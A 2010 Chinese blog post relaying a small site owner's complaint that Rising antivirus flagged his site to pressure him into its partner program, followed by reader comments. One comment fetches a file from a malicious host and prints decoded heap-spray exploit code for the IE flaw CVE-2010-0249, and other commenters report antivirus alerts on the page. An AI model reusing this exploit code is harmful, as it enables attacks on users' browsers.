【活在中国】谁是恶意软件?

作者: 阮一峰

日期: 2010年2月 7日

新增一个"活在中国"栏目。

专门刊登生活在这个国家的真实经历,欢迎大家赐文。

今天刊登的是,"羊城网"小劳站长的来信。从他的经历可以看到,中国的小站长们,不仅要遭受政策压力,还会受到其他的欺压。

=======================

一峰,

我们又遇到麻烦了。

2月3日,我们接连收到网友报告,称网站被瑞星防火墙屏蔽了。

bg2010020701.jpg

我们联系瑞星公司,客服建议我们通过该公司的在线工具进行安全检测。结果显示,有两条URL被挂马。

bg2010020704.jpg

经查看,该两个网页并无任何异常,也无任何连接指向该工具所称的木马网址。其他公司的安全产品(包括诺顿、安全360等)亦无告警。但为了保险起见,我们还是删除了上述两个网页。但删除后,瑞星的防火墙仍然称我们的网站为恶意网站。而通过该工具检测其他一些主流门户网站时,发现新浪、搜狐、网易被"挂马"的URL数量远远高于我们,但瑞星防火墙却并无任何有关恶意网站的提示。

瑞星公司的客服人员建议我们加入"瑞星云安全网站联盟"、挂载该公司提供的监测代码,暗示与其合作,问题就会解决。

bg2010020703.png

至此,我们终于看出了其中的猫腻,瑞星公司的行为实际上是对一些中小网站进行施压,在每个网页挂载它的代码,相当于免费帮它卖广告。至于下一步它会怎样利用这些代码(收集用户信息?),就无从得知了。

bg2010020702.jpg

另一方面,瑞星公司自己的网站,去年七月份就曾被黑客攻击并挂载木马,并且瑞星杀毒软件上月亦曝出存在高危漏洞,显然不能指望它来保护我们。如果我们挂了该公司的代码,反而有可能造成安全隐患。

此外,最近《北京晚报》的报道《北京网监处长受贿1400余万办假案受审 承认帮瑞星公司抓人》,曝光了瑞星公司行贿原北京市公安局网监处处长,通过假报案、假损失、假鉴定的手法陷害竞争对手。这种公司的商业诚信,是令人质疑的。

因此,我们最后决定,不与其合作,不参与"瑞星云安全网站联盟",并建议所有瑞星防火墙的用户卸载该产品。但是,单单靠我们一家小网站,确实难以与瑞星这种庞然大物对抗,希望通过您的网志让更多的网友了解此事。

羊城网 小劳

2009年2月4日

(完)

留言(53条)

瑞星太可恶,微点公司的产品本来应该是很有前途的(虽然在天朝,做得好的话都会被安全部门盯上,最后像360一样成为用户机器上的一个大后门),一批有才华、有创意的开饭人员和他们的领导者,从05年起无端蒙冤至今才算昭雪,现在产品推出的话,估计是没什么机会了,因为类似的防毒理念各大杀毒软件已经都实现了

我对瑞星一直嗤之以鼻,这个败类居然祸害大了,真是没天理。

好人不长命,祸害一万年~

国内的这些公司都有娱乐化和被娱乐化的倾向
大家也各得其乐

瑞星确实差的要命。。。。

最近的贴子充满了爆点。(*^_^*)
强贴留名,我要看能盖几楼。

娱乐公司

我现在比较喜欢用360杀毒软件。

俺这里用的avast5.0,打开了小劳的网站,开了好些个页面,都没有发现什么问题。
哈,有趣啊瑞星。
居然跟百度、360一个X样。

对瑞星无语很久了

去瑞星公司:
一哭二闹三上吊
实在不行:
把花圈扔瑞星去

……对瑞星已经没什么好说的了。就一黑社会,包括但不限于网络。
反而我对【活在中国】很有兴趣,在神奇而和谐的天朝,“与国际接轨”之下的“中国特色”很值得玩味啊!

从来没装过瑞星,以后也不会用。

可以联合上告,瑞星滥用自己的垄断地位损害其他行业的名誉和权益,并为自己谋取不当利益

这就和广告说别人这有问题那有问题自己无问题一样,属于违法广告

我用过一段时间瑞星,瑞星杀毒软件+瑞星防火墙,用起来非常吃系统配置的
再说句不沾边的,没有任何理由让我在电脑上装上这个软件。chrome再吃配置,但它的浏览体验没的说,也不像这软件这么鸡肋。还这么没品!
恕我无才,居然拿Google的软件和瑞星的比。

大家没事儿千万别拿瑞星那个检测工具去查自己的网站,免得被记录为潜在客户。对这种超越了无耻的企业,没有什么是不可能的

离它越远越好,千万别靠近了,从自己做起吧。国内就这情况,满腔热血无奈我也只能看看热闹。

咱身边怎么老出这种败类,太无耻了。

遇到此问题就跟网友说瑞星是垃圾公司 赶紧卸掉

自从某星与卡巴斯基打口水仗,演了一场闹剧,它的名声就在不断下滑。现在又爆出这类事情,某星的公关又要忙了,小心枪手顶上你。

360和瑞星叼着对方的毛发怒目而视~

谁还用瑞星呀,国产的杀毒软件我基本不用,卡巴不用(此物貌似很好很强大,其实不然)。

惨了 我购买了瑞星的了。。哎 闷了

事实上,我们在这个时候发表这份声讨瑞星声明,多少都有些担心会否卷入瑞星和360的口水战,但始终这件事的曝光并不仅仅是针对瑞星,而是更加让大家警惕,在国内互联网政治和商业环境的双重压力下,每一个网站每一个网民都有可能成为温水青蛙。正如韩寒所说,通往朝鲜之路,是每一个沉默的人铺就的……

引用superbass的发言:

瑞星太可恶,微点公司的产品本来应该是很有前途的

微点一样把我的骑墙软件查为木马软件,国外杀毒软件都没有报毒,可以想象这家公司和天朝的关系也不是网上传的那么坏。

引用just的发言:

国内的这些公司都有娱乐化和被娱乐化的倾向
大家也各得其乐

瑞星就是娱乐公司啊,不信去google

瑞星这东西。。。最近名声越来越臭了。
估计不久快倒闭了。

持股票的快抛咯。

无耻的娱乐公司

很多朋友让我帮忙修电脑,只要看到瑞星,我一定帮他们卸载。

国内的杀软也好,antispyware也好统统都是我不信任的东西,大家趁早上windows以外的操作系统吧!

瑞星的查毒速度奇慢。我当时后悔买它,价格也不便宜。现在用金山,还可以。有些人劝我用卡巴,还没试过。不知道还有什么比较好的杀毒软件,大家推荐下。

这个栏目好,把那些丑恶的现象都展示出来。顺便鄙视下瑞星。

以前知道有瑞星,装上之后太烂,就删掉了。

之后再也没有用过瑞星。中国人的良心都跑哪里去了,难道经济发展一定都需要用道德沦丧来作为交换吗?

如果是热爱自由的开发者,我的看法还是DIY一下某个喜欢的linux发行版吧

我一直都用的瑞星。俺也不太懂技术,不知道卸载后,装什么好呢??请高手指点下,不胜感激。

无意攻击那些还在用瑞星的朋友。。包括360。。。但是我要说的是。你们真的很弱智。。
国产软件。。能不用的就尽量别用吧。。
最著名的暴风影音断网事件。。一个播放器,在用户不知情的情况下一直访问网络。。。
QQ。。用的人太多了。。请自行Google:“QQ 老大哥 监视”
pplive。。也算个有名的软件了。。。安装以后。。请自己看看后台的进程。。(我指在退出pplive后看)。。

而目前中国病毒木马横行。。杀毒软件不同于普通软件。。。更为重要。。而且杀毒软件是开机就启动。。长住内存。。。这么重要的软件。。都敢用国产。。我真的很无语。。。

瑞星的案子。。奥运会的时候好像就公布了(号称奥运会用的杀毒软件就是受到瑞星迫害的微点公司的产品)。。。诚信差到如此的公司的产品居然还有人在用?!!

当然本人也不推荐用微点公司的产品。。。用国外的杀毒软件吧。。选择还是很多的。。


gznf.net

摘要
“诺顿网页安全”未发现该站点存在任何问题。
•计算机威胁: 0
•身份威胁: 0
•讨厌因素: 0

该站点上的威胁总数: 0

  还有,谁能解释一下那段代码的含义,难道技术进步了,那么短的一段代码就可以杀毒了?

  有些网站是这么说的:您搜索的网站已经加盟瑞星云安全网站联盟,只有本站的站长才能查看该站的安全情况。
  这里一定有大问题,“我瑞星,我2B啊”。


quote: "新增一个“活在中国”栏目。

专门刊登生活在这个国家的真实经历,欢迎大家赐文。"
-------------

阮老师,如果有生活在中国的正面经历,可以投稿吗?

联想好像和瑞星是一伙的,专门给刚买他们电脑没什么经验的人推荐一起买瑞星。然后就发现一个很不好的现象,比如我买了一年12个月的瑞星产品,10个月过去了如果我不续买他们的杀毒软件,第11、12个月我的电脑里就会出现一些小病小毒,我同学和我差不多同时买的,同样的情况,这事当时就觉得蹊跷,怀疑是瑞星故意的。

普通Windows用户,推荐Avira AntiVir或者Avast或者NOD32,都比瑞星强,另外,安全意识也是非常重要的

从技术上来说,瑞星这个还真没有误报,虽然他们的做法比较不专业

$ wget http://wvvv.wwvv.us/images/css/dom.htm
2010-02-09 13:51:37 (186 KB/s) - `dom.htm' saved [132993/132993]

内容是一个利用heap spray和CVE-2010-0249 Microsoft IE Malform Event Operate Memory Corruption漏洞的攻击代码,混淆机制是在正常html里面掺杂\0字符。

解码后大概内容类似

function ev1(evt)
{
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2()
{ p="\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u
0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c
0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d";
for (i = 0; i < x1.length; i ++ )
{
x1[i].data = p;
};
var t = e1.srcElement;
}

</script>
<span id="sp1"><IMG SRC="mm.gif" onload="ev1(event)"></span>

就是闵行紫竹科技园区的瑞星?

鄙视一下!

天朝的工具

最近360跟瑞星咬的正紧 狗咬狗一嘴毛

不好好做技术 成天打嘴皮子杖 也不知道过的哪门子瘾

用MSE的飘过……自从不小心用了一次瑞星之后就完全被恶心到~

刚看了韩寒与胡戈等人的新作《宅居动物》,充分感受到上述网友的苦楚,建议大家有空看看。

ESET报告这个网页被挂马

普通Windows用户,推荐Avira AntiVir,就是小红伞

同LS, ESET报马了, 这个页面, how?

我用avast

上面留言有个木马样本,每次转到这个页面都要报马

我要发表看法

«-必填

«-必填,不公开

«-我信任你,不会填写广告链接